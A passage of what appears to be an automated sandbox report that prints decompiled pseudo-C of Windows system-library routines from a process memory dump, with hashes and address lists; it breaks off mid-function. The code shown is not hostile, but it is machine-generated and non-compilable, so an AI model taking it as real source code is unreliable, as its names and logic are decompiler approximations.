0x04ab7cd0
0x04ab7cd6
0x04ab7cde
0x04ab7ce4
0x04ab7ce4
0x04ab7cd0
0x00000000
0x04ab7ce8
0x04a4c990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1c8245da76d874dd081c32cf5d539a8638f3297beecf735a7e9abce6dfbcd6
Instruction ID: 21c99125a98fcd4be9a77671c3e69f1ffcbe2bc122687b2a4b89044f863c0b80
Opcode Fuzzy Hash: 8f1c8245da76d874dd081c32cf5d539a8638f3297beecf735a7e9abce6dfbcd6
Instruction Fuzzy Hash: 741102313006069BC751AF79CA849AB77A9FBC5215F00012DF88197661EF70FC10C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04A7002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A7002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04A67D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04A67D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04A67D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04A67D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04a70032
0x04a70037
0x04a70043
0x04ab4b3a
0x04a70049
0x04a70049
0x04a70049
0x04a7004e
0x04a70053
0x04ab4b48
0x04ab4b5a
0x04ab4b4a
0x04ab4b53
0x04ab4b53
0x04ab4b5f
0x00000000
0x04ab4b61
0x00000000
0x04ab4b61
0x04a70059
0x04a70059
0x04a70060
0x04ab4b6f
0x04ab4b6f
0x04a70069
0x04ab4b83
0x00000000
0x00000000
0x04ab4b90
0x04ab4b9b
0x04ab4b9b
0x04ab4ba4
0x00000000
0x00000000
0x04ab4baa
0x00000000
0x04a7006f
0x04a7006f
0x00000000
0x04a7006f
0x04a70069

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 226eee6db4b9982f517edc145282d88bbbe2fe94cdd8b49fc67d1683f9e6d05d
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: EE11E132219680CFF7229B28CE54B7577A8AB457ACF0900A1DE4587693E728F842C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A5766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04A5766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04A7F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04A7F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04A64620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04a57672
0x04a5767f
0x04a57689
0x04a576de
0x04a576de
0x04a5768b
0x04a57691
0x04a57693
0x04a57697
0x00000000
0x04a57699
0x04a576a8
0x00000000
0x04a576aa
0x04a576ad
0x04a576b1
0x00000000
0x04a576b3
0x04a576b3
0x04a576b5
0x04a576ba
0x04a576bc
0x04a576bc
0x04a576c0
0x00000000
0x04a576c2
0x04a576ce
0x04a576ce
0x04a576c0
0x04a576b1
0x04a576a8
0x04a57697
0x04a576d9

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 6da8bd77e14f3bfa5f438358b7c16533384cc0a44ce7c14f4266a8fe9e472566
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: DE01A736701119AFD720EE5ECE51E9B77ADEB84760F240524BD19EB660DA30FD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04ADC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04ADC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04A89910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04A895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04A895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04A895D0();
				return L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x04adc458
0x04adc45d
0x04adc466
0x04adc468
0x04adc469
0x04adc46a
0x04adc46b
0x04adc46e
0x04adc46f
0x04adc471
0x04adc476
0x04adc476
0x04adc47c
0x04adc47e
0x04adc480
0x04adc480
0x04adc483
0x04adc484
0x04adc486
0x04adc488
0x04adc48f
0x04adc491
0x04adc493
0x04adc493
0x04adc48f
0x04adc498
0x04adc49e
0x04adc4ad
0x04adc4ad
0x04adc4b2
0x04adc4b4
0x04adc4cd

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 19705db5270751c3633bd8260ecc5aff01e06422028962687dd67d7a0536fb0f
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 8C01D2B2140505BFE725AF25CD84E63FB7DFF447A8F404129F11542560CB25BCA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A49080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04A49080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4b385ec;
				E04A62280(_t48, 0x4b385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04A5FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4b3538c; // 0x771c68c8
					if( *_t84 != 0x4b35388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4b1f6e8);
						E04A9D0E8(0x4b385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04B188F5(_t80, _t85, 0x4b35388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4b386c0; // 0xdc07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4b386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04A62280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04B188F5(0x4b385ec, _t85, 0x4b35388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04A8AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4b3b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4b384c0;
																			if(_t82 >=  *0x4b384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04B19063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04A4922A(_t99);
										_t64 = E04A67D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04B18B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4b386c0; // 0xdc07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4b386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4b386bc;
													_t87 = 0x4b386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04A49240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4b386c4;
												_t87 = 0x4b386c0;
												L27:
												E04A79B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04A9D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4b35388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4b3538c = _t51;
						goto L6;
					}
				}
			}

0x04a49082
0x04a49083
0x04a49084
0x04a49085
0x04a49087
0x04a49096
0x04a49098
0x04a49098
0x04a4909e
0x04a490a8
0x04a490e7
0x04a490e7
0x04a490aa
0x04a490b0
0x04a490b7
0x04a490bd
0x04a490dd
0x04a490e6
0x04a490bf
0x04a490bf
0x04a490c7
0x04a490cf
0x04a490f1
0x04a490f2
0x04a490f4
0x04a490f5
0x04a490f6
0x04a490f7
0x04a490f8
0x04a490f9
0x04a490fa
0x04a490fb
0x04a490fc
0x04a490fd
0x04a490fe
0x04a490ff
0x04a49100
0x04a49102
0x04a49107
0x04a4910c
0x04a49110
0x04a49113
0x04a49115
0x04a49136
0x04a4913f
0x04a49143
0x04aa37e4
0x04aa37e4
0x04a49117
0x04a49117
0x04a4911d
0x00000000
0x04a4911f
0x04a4911f
0x04a49125
0x00000000
0x04a49127
0x04a4912d
0x04a49130
0x04a49134
0x04a49158
0x04a4915d
0x04a49161
0x04a49168
0x04aa3715
0x04a4916e
0x04a4916e
0x04a49175
0x04a49177
0x04a4917e
0x04a4917f
0x04a49182
0x04a49182
0x04a49187
0x04a49187
0x04a4918a
0x04a4918d
0x04a4918f
0x04a49192
0x04a49195
0x04a49198
0x04a49198
0x04a49198
0x04a4919a
0x00000000
0x00000000
0x04aa371f
0x04aa3721
0x04aa3727
0x04aa372f
0x04aa3733
0x04aa3735
0x04aa3738
0x04aa373b
0x04aa373d
0x04aa3740
0x00000000
0x04aa3746
0x04aa3746
0x04aa3749
0x00000000
0x04aa374f
0x04aa374f
0x04aa3751
0x04aa3757
0x04aa3759
0x04aa375c
0x04aa375c
0x04aa375e
0x04aa375e
0x04aa3761
0x04aa3764
0x00000000
0x00000000
0x04aa3766
0x04aa3768
0x04aa37a3
0x04aa37a3
0x04aa37a5
0x04aa37a7
0x04aa37ad
0x04aa37b0
0x04aa37b2
0x04aa37bc
0x04aa37c2
0x04aa37c2
0x04aa37b2
0x04a49187
0x04a49187
0x04a4918a
0x04a4918d
0x04a4918f
0x04a49192
0x04a49195
0x00000000
0x04a49195
0x00000000
0x04aa376a
0x04aa376a
0x04aa376a
0x04aa376c
0x04aa376c
0x04aa376f
0x04aa3775
0x00000000
0x00000000
0x04aa3777
0x04aa3779
0x04aa3782
0x04aa3787
0x04aa3789
0x04aa3790
0x04aa3790
0x04aa378b
0x04aa378b
0x04aa378b
0x04aa3792
0x04aa3795
0x00000000
0x04aa3795
0x00000000
0x04aa3779
0x04aa3798
0x00000000
0x04aa3798
0x00000000
0x04aa3768
0x04aa379b
0x04aa379b
0x04aa3751
0x04aa3749
0x00000000
0x04aa3740
0x04a491a0
0x04a491a3
0x04a491a9
0x04a491b0
0x00000000
0x04a491b0
0x04a49187
0x04a491b4
0x04a491b4
0x04a491bb
0x04a491c0
0x04a491c5
0x04a491c7
0x04aa37da
0x04a491cd
0x04a491cd
0x04a491cd
0x04a491d2
0x04a491d5
0x04a49239
0x04a49239
0x04a491d7
0x04a491db
0x04a491e1
0x04a491e7
0x04a491fd
0x04a49203
0x04a4921e
0x04a49223
0x00000000
0x04a49205
0x04a49205
0x04a49208
0x04a4920c
0x04a49214
0x04a49214
0x04a4920c
0x04a491e9
0x04a491e9
0x04a491ee
0x04a491f3
0x04a491f3
0x04a491f3
0x04a491e7
0x00000000
0x00000000
0x00000000
0x04a49134
0x04a49125
0x04a4911d
0x04a4914e
0x04a490d1
0x04a490d1
0x04a490d3
0x04a490d6
0x04a490d8
0x00000000
0x04a490d8
0x04a490cf

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82eb5136e66836b47a02c42e6abf927a936f15ae68212212ee107ab72ae5577
Instruction ID: 8864ed4b39b25042efbb63b4ee2a57b8ef86092af6b33fdb80beabe3c6a199b6
Opcode Fuzzy Hash: a82eb5136e66836b47a02c42e6abf927a936f15ae68212212ee107ab72ae5577
Instruction Fuzzy Hash: 4B01FFB26012009FE3249F29D840B1BBBF9EBC5325F214066E5069B691C374FC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B14015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04B14015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04A62280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04A62280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4b386ac);
					E04A4F900(0x4b386d4, _t28);
					E04A5FFB0(0x4b386ac, _t28, 0x4b386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04A5FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x04b1401a
0x04b1401e
0x04b14023
0x04b14028
0x04b14029
0x04b1402b
0x04b1402f
0x04b14043
0x04b14046
0x04b14051
0x04b14057
0x04b1405f
0x04b14062
0x04b14067
0x04b1406f
0x04b1407c
0x04b1407c
0x04b1408c
0x04b1408c
0x04b14097

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f19420bddb033e58339bfbec4498ebee67311399ef086368deb844dcd241c3
Instruction ID: 9da6d63f4cc3a8bc7c3e10a580faff106c0911ba8d3d33b39d037f34e3de8875
Opcode Fuzzy Hash: e2f19420bddb033e58339bfbec4498ebee67311399ef086368deb844dcd241c3
Instruction Fuzzy Hash: 880184722015457FE311BB79CE84E17B7ACEB45758B000665B50887A61CB38FC15C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 04B014FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04B014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4b3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04A8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04A67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04b014fb
0x04b014fb
0x04b0150a
0x04b01514
0x04b01519
0x04b0151b
0x04b01526
0x04b0152c
0x04b01534
0x04b01537
0x04b0153a
0x04b01545
0x04b01557
0x04b01547
0x04b01550
0x04b01550
0x04b01562
0x04b01563
0x04b01565
0x04b0156a
0x04b0157f

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0da3f67c8febbe0b6b0a020a90d792eb0f9b085b858cba69db9b70c947ec81
Instruction ID: 67ae1362120e8f7cb78f7be7c8198c9e2d83562405f1043c15a59300d2860519
Opcode Fuzzy Hash: cb0da3f67c8febbe0b6b0a020a90d792eb0f9b085b858cba69db9b70c947ec81
Instruction Fuzzy Hash: 6001B571A00248AFDB04EF69D941EAEBBB8EF44714F40406AF905EB380D674EE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04B0138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04B0138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4b3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04A8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04A67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04b0138a
0x04b0138a
0x04b01399
0x04b013a3
0x04b013a8
0x04b013aa
0x04b013b5
0x04b013bb
0x04b013c3
0x04b013c6
0x04b013c9
0x04b013d4
0x04b013e6
0x04b013d6
0x04b013df
0x04b013df
0x04b013f1
0x04b013f2
0x04b013f4
0x04b013f9
0x04b0140e

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9943269b1421db1a673577a89242e55b8483db503da6815fe9e033a8246947f8
Instruction ID: 490444996195c85dc512499e6f2d6f1187db824a03fa93b7ab7c4c5f86e73354
Opcode Fuzzy Hash: 9943269b1421db1a673577a89242e55b8483db503da6815fe9e033a8246947f8
Instruction Fuzzy Hash: C7015671A00218AFDB14EFA9D981EAEBBB8EF44714F40405AB905EB280D675EE01C794

Uniqueness

Uniqueness Score: -1.00%

Function 04A458EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04A458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4b3d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4a25c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04A45943() != 0 &&  *0x4b35320 > 5) {
					E04AC7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04AC7B5E( &_v28, _t28);
					_t11 = E04AC7B9C(0x4b35320, 0x4a2bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04A8B640(_t11, _t17, _v8 ^ _t29, 0x4a2bf15, _t27, _t28);
			}

0x04a458fb
0x04a458fe
0x04a45906
0x04a4590a
0x04a4593c
0x04a4593c
0x04a4590c
0x04a4590c
0x04a45911
0x00000000
0x04a45913
0x04a45913
0x04a45913
0x04a45911
0x04a4591d
0x04aa1035
0x04aa103c
0x04aa103f
0x04aa1056
0x04aa1056
0x04a4593b

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804bb41ac3bd53b591e1b5b296af4d85b5b783bfeedd6df1eae3247669107845
Instruction ID: a4943ce763a21ceaa5f957fa9cd15a53416b47958f61469b13c4ee89e9e96c1b
Opcode Fuzzy Hash: 804bb41ac3bd53b591e1b5b296af4d85b5b783bfeedd6df1eae3247669107845
Instruction Fuzzy Hash: 4001A235F00118BBEB14EFA9D9009AE77BCEFC4234F940069A906A7241EE30FD01C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 04AFFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04AFFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4b3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04A8FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04A67D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
